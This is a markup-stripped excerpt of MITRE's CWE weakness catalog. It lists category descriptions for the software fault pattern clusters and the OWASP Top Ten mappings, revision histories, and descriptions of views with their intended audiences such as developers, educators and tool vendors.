Cluster: Tainted Input - - - - This category identifies Software Fault Patterns (SFPs) within the Entry Points cluster (SFP28). - - - - - - CWE Content Team - MITRE - 2012-03-22 - - - CWE Content Team - MITRE - 2014-07-30 - updated Name, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - SFP Cluster: Entry Points - - - - This category identifies Software Fault Patterns (SFPs) within the Authentication cluster (SFP29, SFP30, SFP31, SFP32, SFP33, SFP34). - - - - - - - - - - - - - - CWE Content Team - MITRE - 2012-03-22 - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Name, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - SFP Cluster: Authentication - - - - This category identifies Software Fault Patterns (SFPs) within the Access Control cluster (SFP35). - - - - - - - - CWE Content Team - MITRE - 2012-03-22 - - - CWE Content Team - MITRE - 2014-07-30 - updated Name, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - SFP Cluster: Access Control - - - - This category identifies Software Fault Patterns (SFPs) within the Privilege cluster (SFP36). - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2012-03-22 - - - CWE Content Team - MITRE - 2014-07-30 - updated Name - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - SFP Cluster: Privilege - - - - This category identifies Software Fault Patterns (SFPs) within the Channel cluster. - - - - - - - CWE Content Team - MITRE - 2012-03-22 - - - CWE Content Team - MITRE - 2014-07-30 - updated Name, Relationships - - SFP Cluster: Channel - - - - This category identifies Software Fault Patterns (SFPs) within the Cryptography cluster. - - - - - - - CWE Content Team - MITRE - 2012-03-22 - - - CWE Content Team - MITRE - 2014-07-30 - updated Name, Relationships - - SFP Cluster: Cryptography - - - - This category identifies Software Fault Patterns (SFPs) within the Malware cluster. - - - - - - - - - - - - - - CWE Content Team - MITRE - 2012-03-22 - - - CWE Content Team - MITRE - 2014-07-30 - updated Name, Relationships - - SFP Cluster: Malware - - - - This category identifies Software Fault Patterns (SFPs) within the Predictability cluster. - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2012-03-22 - - - CWE Content Team - MITRE - 2014-07-30 - updated Name - - SFP Cluster: Predictability - - - - This category identifies Software Fault Patterns (SFPs) within the UI cluster. - - - - - - - - CWE Content Team - MITRE - 2012-03-22 - - - CWE Content Team - MITRE - 2014-07-30 - updated Name, Relationships - - SFP Cluster: UI - - - - This category identifies Software Fault Patterns (SFPs) within the Other cluster. - - - - - - - - - CWE Content Team - MITRE - 2012-03-22 - - - CWE Content Team - MITRE - 2014-07-30 - updated Name, Relationships - - SFP Cluster: Other - - - - Weaknesses in this category are related to the A1 category in the OWASP Top Ten 2013. - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2013-07-16 - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - - - Weaknesses in this category are related to the A2 category in the OWASP Top Ten 2013. - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2013-07-17 - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2018-01-24 - updated Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - - - Weaknesses in this category are related to the A3 category in the OWASP Top Ten 2013. - - - - - - - - - CWE Content Team - MITRE - 2013-07-16 - - - - - Weaknesses in this category are related to the A4 category in the OWASP Top Ten 2013. - - - - - - - - - - - - CWE Content Team - MITRE - 2013-07-16 - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - - - Weaknesses in this category are related to the A5 category in the OWASP Top Ten 2013. - - - - - - - - - - - - - CWE Content Team - MITRE - 2013-07-16 - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - - - Weaknesses in this category are related to the A6 category in the OWASP Top Ten 2013. - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2013-07-16 - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - - - Weaknesses in this category are related to the A7 category in the OWASP Top Ten 2013. - - - - - - - - - CWE Content Team - MITRE - 2013-07-16 - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - - - Weaknesses in this category are related to the A8 category in the OWASP Top Ten 2013. - - - - - - - - - CWE Content Team - MITRE - 2013-07-16 - - - - - Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2013. - - - - - This is an unusual category. CWE does not cover the limitations of human processes and procedures that cannot be described in terms of a specific technical weakness as resident in the code, architecture, or configuration of the software. Since "known vulnerabilities" can arise from any kind of weakness, it is not possible to map this OWASP category to other CWE entries, since it would effectively require mapping this category to ALL weaknesses. - - - - CWE Content Team - MITRE - 2013-07-16 - - - - - Weaknesses in this category are related to the A10 category in the OWASP Top Ten 2013. - - - - - - - - - CWE Content Team - MITRE - 2013-07-16 - - - - - This category identifies Software Fault Patterns (SFPs) within the Access Management cluster. - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - - - This category identifies Software Fault Patterns (SFPs) within the Insecure Resource Access cluster (SFP35). - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - - - This category identifies Software Fault Patterns (SFPs) within the Insecure Resource Permissions cluster. - - - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - - - This category identifies Software Fault Patterns (SFPs) within the Authentication Bypass cluster. - - - - - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2017-05-03 - updated Relationships - - - - - This category identifies Software Fault Patterns (SFPs) within the Digital Certificate cluster. - - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - - - This category identifies Software Fault Patterns (SFPs) within the Faulty Endpoint Authentication cluster (SFP29). - - - - - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - - - This category identifies Software Fault Patterns (SFPs) within the Hardcoded Sensitive Data cluster (SFP33). - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - - - This category identifies Software Fault Patterns (SFPs) within the Insecure Authentication Policy cluster. - - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - - - This category identifies Software Fault Patterns (SFPs) within the Missing Authentication cluster. - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - - - This category identifies Software Fault Patterns (SFPs) within the Missing Endpoint Authentication cluster (SFP30). - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - - - This category identifies Software Fault Patterns (SFPs) within the Multiple Binds to the Same Port cluster (SFP32). - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - - - This category identifies Software Fault Patterns (SFPs) within the Unrestricted Authentication cluster (SFP34). - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - - - This category identifies Software Fault Patterns (SFPs) within the Channel Attack cluster. - - - - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - - - This category identifies Software Fault Patterns (SFPs) within the Protocol Error cluster. - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - - - This category identifies Software Fault Patterns (SFPs) within the Broken Cryptography cluster. - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - - - This category identifies Software Fault Patterns (SFPs) within the Weak Cryptography cluster. - - - - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - - - This category identifies Software Fault Patterns (SFPs) within the Ambiguous Exception Type cluster (SFP5). - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - - - This category identifies Software Fault Patterns (SFPs) within the Incorrect Exception Behavior cluster (SFP6). - - - - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - - - This category identifies Software Fault Patterns (SFPs) within the Unchecked Status Condition cluster (SFP4). - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - - - This category identifies Software Fault Patterns (SFPs) within the Exposed Data cluster (SFP23). - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - - - This category identifies Software Fault Patterns (SFPs) within the Exposure Temporary File cluster. - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - - - This category identifies Software Fault Patterns (SFPs) within the Insecure Session Management cluster. - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - - - This category identifies Software Fault Patterns (SFPs) within the Other Exposures cluster. - - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - - - This category identifies Software Fault Patterns (SFPs) within the State Disclosure cluster. - - - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - - - This category identifies Software Fault Patterns (SFPs) within the Covert Channel cluster. - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - - - This category identifies Software Fault Patterns (SFPs) within the Faulty Memory Release cluster (SFP12). - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - - - - This category identifies Software Fault Patterns (SFPs) within the Faulty Buffer Access cluster (SFP8). - - - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - - - This category identifies Software Fault Patterns (SFPs) within the Faulty Pointer Use cluster (SFP7). - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - - - This category identifies Software Fault Patterns (SFPs) within the Faulty String Expansion cluster (SFP9). - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - - - This category identifies Software Fault Patterns (SFPs) within the Improper NULL Termination cluster (SFP11). - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - - - This category identifies Software Fault Patterns (SFPs) within the Incorrect Buffer Length Computation cluster (SFP10). - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - - - This category identifies Software Fault Patterns (SFPs) within the Architecture cluster. - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - - - This category identifies Software Fault Patterns (SFPs) within the Compiler cluster. - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - - - This category identifies Software Fault Patterns (SFPs) within the Design cluster. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - - - - This category identifies Software Fault Patterns (SFPs) within the Implementation cluster. - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - This category identifies Software Fault Patterns (SFPs) within the Failed Chroot Jail cluster (SFP17). - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - - - This category identifies Software Fault Patterns (SFPs) within the Link in Resource Name Resolution cluster (SFP18). - - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - - - This category identifies Software Fault Patterns (SFPs) within the Path Traversal cluster (SFP16). - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - - - This category identifies Software Fault Patterns (SFPs) within the Failure to Release Resource cluster (SFP14). - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - - - - This category identifies Software Fault Patterns (SFPs) within the Faulty Resource Use cluster (SFP15). - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - - - This category identifies Software Fault Patterns (SFPs) within the Life Cycle cluster. - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - - - This category identifies Software Fault Patterns (SFPs) within the Unrestricted Consumption cluster (SFP13). - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - - - This category identifies Software Fault Patterns (SFPs) within the Missing Lock cluster (SFP19). - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - - - This category identifies Software Fault Patterns (SFPs) within the Multiple Locks/Unlocks cluster (SFP21). - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - - - This category identifies Software Fault Patterns (SFPs) within the Race Condition Window cluster (SFP20). - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - - - This category identifies Software Fault Patterns (SFPs) within the Unrestricted Lock cluster (SFP22). - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - - - This category identifies Software Fault Patterns (SFPs) within the Tainted Input to Command cluster (SFP24). - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - - - This category identifies Software Fault Patterns (SFPs) within the Tainted Input to Environment cluster (SFP27). - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2017-05-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - - - This category identifies Software Fault Patterns (SFPs) within the Faulty Input Transformation cluster. - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - - - This category identifies Software Fault Patterns (SFPs) within the Incorrect Input Handling cluster. - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - - - This category identifies Software Fault Patterns (SFPs) within the Tainted Input to Variable cluster (SFP25). - - - - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - - - - This category identifies Software Fault Patterns (SFPs) within the Feature cluster. - - - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - - - This category identifies Software Fault Patterns (SFPs) within the Security cluster. - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - - - This category identifies Software Fault Patterns (SFPs) within the Information Loss cluster. - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - - - This category identifies Software Fault Patterns (SFPs) within the Glitch in Computation cluster (SFP1). - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2014-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - - - - - - This view is intended to facilitate research into weaknesses, including their inter-dependencies, and can be leveraged to systematically identify theoretical gaps within CWE. It is mainly organized according to abstractions of behaviors instead of how they can be detected, where they appear in code, or when they are introduced in the development life cycle. By design, this view is expected to include every weakness within CWE. - - Academic Researchers - Academic researchers can use the high-level classes that lack a significant number of children to identify potential areas for future research. - - - Vulnerability Analysts - Those who perform vulnerability discovery/analysis use this view to identify related weaknesses that might be leveraged by following relationships between higher-level classes and bases. - - - Assessment Tool Vendors - Assessment vendors often use this view to help identify additional weaknesses that a tool may be able to detect as the relationships are more aligned with a tool's technical capabilities. - - - - - - - - - - - - - - - - This view uses a deep hierarchical organization, with more levels of abstraction than other classification schemes. The top-level entries are called Pillars. Where possible, this view uses abstractions that do not consider particular languages, frameworks, technologies, life cycle development phases, frequency of occurrence, or types of resources. It explicitly identifies relationships that form chains and composites, which have not been a formal part of past classification efforts. Chains and composites might help explain why mutual exclusivity is difficult to achieve within security error taxonomies. This view is roughly aligned with MITRE's research into vulnerability theory, especially with respect to behaviors and resources. Ideally, this view will only cover weakness-to-weakness relationships, with minimal overlap and zero categories. It is expected to include at least one parent/child relationship for every weakness within CWE. - - - - CWE Content Team - MITRE - 2008-04-11 - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Name, Relationships, View_Audience, View_Structure - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Description, Other_Notes, View_Audience - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, View_Audience - - - CWE Content Team - MITRE - 2021-03-15 - updated Description, Other_Notes - - Natural Hierarchy - - - - CWE entries in this view (graph) may be used to categorize potential weaknesses within sources that handle public, third-party vulnerability information, such as the National Vulnerability Database (NVD). By design, this view is incomplete; it is limited to a small number of the most commonly-seen weaknesses, so that it is easier for humans to use. This view uses a shallow hierarchy of two levels in order to simplify the complex, category-oriented navigation of the entire CWE corpus. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - This view may change in any upcoming CWE version based on the experience of NVD analysts, public feedback, and the CWE Team - especially with respect to the CWE Top 25 analysis. - This view has been modified significantly since its last major revision in 2016 (CWE-635 was used before 2016). - - - - CWE Content Team - MITRE - 2015-12-07 - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2019-09-19 - updated Description, Maintenance_Notes, Relationships - - - CWE Content Team - MITRE - 2019-09-23 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes - - - NIST - 2015-12-07 - Provided many relationships. - - - - - This view organizes weaknesses according to common architectural security tactics. It is intended to assist architects in identifying potential mistakes that can be made when designing software. - - - Software Developers - Architects that are part of a software development team may find this view useful as the weaknesses are organized by known security tactics, aiding the arcitect in embedding security throughout the design process instead of discovering weaknesses after the software has been built. - - - Educators - Educators may use this view as reference material when discussing security by design or architectural weaknesses, and the types of mistakes that can be made. - - - - - - - - - - - - - - - - - - - - - - The top level categories in this view represent the individual tactics that are part of a secure-by-design approach to software development. The weaknesses that are members of each category contain information about how each is introduced relative to the software's architecture. Three different modes of introduction are used: Omission - caused by missing a security tactic when it is necessary. Commission - refers to incorrect choice of tactics which could result in undesirable consequences. Realization - appropriate security tactics are adopted but are incorrectly implemented. - - - - Joanna C.S. Santos, Mehdi Mirakhorli - 2017-06-22 - Provided the catalog, Common Architectural Weakness Enumeration (CAWE), and research papers for this view. - - - CWE Content Team - MITRE - 2018-03-27 - updated Description, Other_Notes, View_Audience - - - CWE Content Team - MITRE - 2020-02-24 - updated Maintenance_Notes, View_Audience - - - - - CWE nodes in this view (graph) are associated with the OWASP Top Ten, as released in 2017. - - - Software Developers - This view outlines the most important issues as identified by the OWASP Top Ten (2017 version), providing a good starting point for web application developers who want to code more securely. - - - Product Customers - This view outlines the most important issues as identified by the OWASP Top Ten (2017 version), providing product customers with a way of asking their software development teams to follow minimum expectations for secure code. - - - Educators - Since the OWASP Top Ten covers the most frequently encountered issues, this view can be used by educators as training material for students. - - - - - - - - - - - - - - - - - - - The relationships in this view have been pulled directly from the 2017 OWASP Top 10 document, either from the explicit mapping section, or from weakness types alluded to in the written sections. - - - - CWE Content Team - MITRE - 2018-01-22 - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2020-02-24 - updated References, View_Audience - - - - - CWE identifiers in this view (slice) are quality issues that only indirectly make it easier to introduce a vulnerability and/or make the vulnerability more difficult to detect or mitigate. - - - Assessment Tool Vendors - This view makes it easier for assessment vendors to identify and improve coverage for quality-related weaknesses. - - - Software Developers - This view makes it easier for developers to identify and learn about issues that might make their code more difficult to maintain, perform efficiently or reliably, or secure. - - - Product Vendors - This view makes it easier for software vendors to identify important issues that may make their software more difficult to maintain, perform efficiently or reliably, or secure. - - - /Weakness_Catalog/Weaknesses/Weakness[Weakness_Ordinalities/Weakness_Ordinality/Ordinality='Indirect'] - - - CWE Content Team - MITRE - 2018-07-12 - View originally constructed using entries from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated View_Audience - - - - - CWE entries in this view have maintenance notes. Maintenance notes are an indicator that an entry might change significantly in future versions. This view was created due to feedback from the CWE Board and participants in the CWE Compatibility Summit in March 2021. - - - Assessment Tool Vendors - Assessment vendors may use this view to anticipate future changes to CWE that will help them to better prepare customers for important changes in CWE. - - - /Weakness_Catalog/*/*[Notes/Note[@Type='Maintenance']] - - - CWE Content Team - MITRE - 2021-03-14 - - - - - This view outlines the most important software quality issues as identified by the Consortium for Information & Software Quality (CISQ) Automated Quality Characteristic Measures, released in 2016. These measures are derived from Object Management Group (OMG) standards. - - - Software Developers - This view provides a good starting point for anyone involved in software development (including architects, designers, coders, and testers) to ensure that code quality issues are considered during the development process. - - - Product Vendors - This view can help product vendors understand code quality issues and convey an overall status of their software. - - - Assessment Tool Vendors - This view provides a good starting point for assessment tool vendors (e.g., vendors selling static analysis tools) who wish to understand what constitutes software with good code quality, and which quality issues may be of concern. - - - - - - - - - - - - - - CWE Content Team - MITRE - 2018-07-23 - View constructed using Common Quality Enumeration (CQE) draft 0.9, constructed using view 9001. - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, View_Audience - - - CWE Content Team - MITRE - 2020-06-25 - updated References - - - - - CWE entries in this view (graph) are fully or partially eliminated by following the guidance presented in the online wiki that reflects that current rules and recommendations of the SEI CERT Oracle Coding Standard for Java. - - - Software Developers - By following the SEI CERT Oracle Coding Standard for Java, developers will be able to fully or partially prevent the weaknesses that are identified in this view. In addition, developers can use a CWE coverage graph to determine which weaknesses are not directly addressed by the standard, which will help identify and resolve remaining gaps in training, tool acquisition, or other approaches for reducing weaknesses. - - - Product Customers - If a software developer claims to be following the SEI CERT Oracle Secure Coding Standard for Java, then customers can search for the weaknesses in this view in order to formulate independent evidence of that claim. - - - Educators - Educators can use this view in multiple ways. For example, if there is a focus on teaching weaknesses, the educator could link them to the relevant Secure Coding Standard. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - The relationships in this view were determined based on specific statements within the rules from the standard. Not all rules have direct relationships to individual weaknesses, although they likely have chaining relationships in specific circumstances. - - - - CWE Content Team - MITRE - 2018-12-11 - - - CWE Content Team - MITRE - 2020-02-24 - updated View_Audience - - - - - CWE entries in this view (graph) are fully or partially eliminated by following the guidance presented in the online wiki that reflects that current rules and recommendations of the SEI CERT C Coding Standard. - - - Software Developers - By following the SEI CERT C Coding Standard, developers will be able to fully or partially prevent the weaknesses that are identified in this view. In addition, developers can use a CWE coverage graph to determine which weaknesses are not directly addressed by the standard, which will help identify and resolve remaining gaps in training, tool acquisition, or other approaches for reducing weaknesses. - - - Product Customers - If a software developer claims to be following the SEI CERT C Coding standard, then customers can search for the weaknesses in this view in order to formulate independent evidence of that claim. - - - Educators - Educators can use this view in multiple ways. For example, if there is a focus on teaching weaknesses, the educator could link them to the relevant Secure Coding Standard. - - - - - - - - - - - - - - - - - - - - - - - - - - The relationships in this view were determined based on specific statements within the rules from the standard. Not all rules have direct relationships to individual weaknesses, although they likely have chaining relationships in specific circumstances. - - - - CWE Content Team - MITRE - 2018-12-18 - - - CWE Content Team - MITRE - 2020-02-24 - updated View_Audience - - - - - CWE entries in this view (graph) are fully or partially eliminated by following the guidance presented in the online wiki that reflects that current rules and recommendations of the SEI CERT Perl Coding Standard. - - - Software Developers - By following the SEI CERT Perl Coding Standard, developers will be able to fully or partially prevent the weaknesses that are identified in this view. In addition, developers can use a CWE coverage graph to determine which weaknesses are not directly addressed by the standard, which will help identify and resolve remaining gaps in training, tool acquisition, or other approaches for reducing weaknesses. - - - Product Customers - If a software developer claims to be following the SEI CERT Perl Coding Standard, then customers can search for the weaknesses in this view in order to formulate independent evidence of that claim. - - - Educators - Educators can use this view in multiple ways. For example, if there is a focus on teaching weaknesses, the educator could link them to the relevant Secure Coding Standard. - - - - - - - - - - - - - - - - - The relationships in this view were determined based on specific statements within the rules from the standard. Not all rules have direct relationships to individual weaknesses, although they likely have chaining relationships in specific circumstances. - - - - CWE Content Team - MITRE - 2019-01-08 - - - CWE Content Team - MITRE - 2020-02-24 - updated View_Audience - - - - - This view organizes weaknesses around concepts that are frequently used or encountered in hardware design. Accordingly, this view can align closely with the perspectives of designers, manufacturers, educators, and assessment vendors. It provides a variety of categories that are intended to simplify navigation, browsing, and mapping. - - - Hardware Designers - Hardware Designers use this view to better understand potential mistakes that can be made in specific areas of their IP design. The use of concepts with which hardware designers are familiar makes it easier to navigate. - - - Educators - Educators use this view to teach future professionals about the types of mistakes that are commonly made in hardware design. - - - - - - - - - - - - - - - - - - The top level categories in this view represent commonly understood areas/terms within hardware design, and are meant to aid the user in identifying potential related weaknesses. It is possible for the same weakness to exist within multiple different categories. - This view attempts to present weaknesses in a simple and intuitive way. As such it targets a single level of abstraction. It is important to realize that not every CWE will be represented in this view. High-level class weaknesses and low-level variant weaknesses are mostly ignored. However, by exploring the weaknesses that are included, and following the defined relationships, one can find these higher and lower level weaknesses. - - - - CWE Content Team - MITRE - 2019-12-27 - - - - - CWE entries in this view are listed in the 2019 CWE Top 25 Most Dangerous Software Errors. - - - Software Developers - By following the Top 25, developers will be able to significantly reduce the number of weaknesses that occur in their software. - - - Product Customers - If a software developer claims to be following the Top 25, then customers can use the weaknesses in this view in order to formulate independent evidence of that claim. - - - Educators - Educators can use this view in multiple ways. For example, if there is a focus on teaching weaknesses, the educator could focus on the Top 25. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2019-09-18 - - - CWE Content Team - MITRE - 2020-02-24 - updated View_Audience - - - - - This view outlines the most important software quality issues as identified by the Consortium for Information & Software Quality (CISQ) Automated Quality Characteristic Measures, released in 2020. These measures are derived from Object Management Group (OMG) standards. - - - Software Developers - This view provides a good starting point for anyone involved in software development (including architects, designers, coders, and testers) to ensure that code quality issues are considered during the development process. - - - Product Vendors - This view can help product vendors understand code quality issues and convey an overall status of their software. - - - Assessment Tool Vendors - This view provides a good starting point for assessment tool vendors (e.g., vendors selling static analysis tools) who wish to understand what constitutes software with good code quality, and which quality issues may be of concern. - - - - - - - - - - - - - - CWE Content Team - MITRE - 2020-08-18 - - - - - CWE entries in this view are listed in the 2021 CWE Top 25 Most Dangerous Software Weaknesses. - - - Software Developers - By following the CWE Top 25, developers are able to significantly reduce the number of weaknesses that occur in their software. - - - Product Customers - Customers can use the weaknesses in this view in order to formulate independent evidence of a claim by a product vendor to have eliminated / mitigated the most dangerous weaknesses. - - - Educators - Educators can use this view to focus curriculum and teachings on the most dangerous weaknesses. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2021-06-22 - - - - - This view outlines the SMM representation of the Automated Source Code Data Protection Measurement specifications, as identified by the Consortium for Information & Software Quality (CISQ) Working Group. - - - Software Developers - This view provides a good starting point for anyone involved in software development (including architects, designers, coders, and testers) to ensure that code quality issues are considered during the development process. - - - Product Vendors - This view can help product vendors understand code quality issues and convey an overall status of their software. - - - Assessment Tool Vendors - This view provides a good starting point for assessment tool vendors (e.g., vendors selling static analysis tools) who wish to understand what constitutes software with good code quality, and which quality issues may be of concern. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2020-12-10 - - - - - CWE entries in this view are listed in the 2021 CWE Most Important Hardware Weaknesses List, as determined by the Hardware CWE Special Interest Group (HW CWE SIG). - - - Hardware Designers - By following this list, hardware designers and implementers are able to significantly reduce the number of weaknesses that occur in their products. - - - Product Customers - Customers can use the weaknesses in this view in order to formulate independent evidence of a claim by a product vendor to have eliminated / mitigated the most dangerous weaknesses. - - - Educators - Educators can use this view to focus curriculum on the most important hardware weaknesses. - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2021-09-29 - - - - - CWE entries in this view (graph) are associated with the OWASP Top Ten, as released in 2021. - - - Software Developers - This view outlines the most important issues as identified by the OWASP Top Ten (2021 version), providing a good starting point for web application developers who want to code more securely. - - - Product Customers - This view outlines the most important issues as identified by the OWASP Top Ten (2021 version), providing product customers with a way of asking their software development teams to follow minimum expectations for secure code. - - - Educators - Since the OWASP Top Ten covers the most frequently encountered issues, this view can be used by educators as training material for students. - - - - - - - - - - - - - - - - - - - As of CWE 4.6, the relationships in this view were pulled directly from the CWE mappings cited in the 2021 OWASP Top Ten. These mappings include categories and high-level weaknesses. One mapping to a deprecated entry was removed. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself. - - - - CWE Content Team - MITRE - 2021-10-05 - - - - - CWE entries in this view are listed in the 2020 CWE Top 25 Most Dangerous Software Weaknesses. - - - 